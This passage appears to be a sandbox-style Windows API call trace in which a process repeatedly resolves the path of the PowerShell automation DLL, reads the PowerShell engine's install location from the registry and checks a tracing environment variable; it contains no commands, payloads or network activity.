	[0096.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.475] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16db78 | out: phkResult=0x16db78*=0x390) returned 0x0
	[0096.475] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dafc, lpData=0x0, lpcbData=0x16daf8*=0x0 | out: lpType=0x16dafc*=0x1, lpData=0x0, lpcbData=0x16daf8*=0x56) returned 0x0
	[0096.475] CoTaskMemAlloc (cb=0x5a) returned 0x1b8636d0
	[0096.475] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dacc, lpData=0x1b8636d0, lpcbData=0x16dac8*=0x56 | out: lpType=0x16dacc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16dac8*=0x56) returned 0x0
	[0096.475] CoTaskMemFree (pv=0x1b8636d0) 
	[0096.476] RegCloseKey (hKey=0x390) returned 0x0
	[0096.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.484] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0096.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0096.484] CoTaskMemFree (pv=0x307fb0) 
	[0096.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
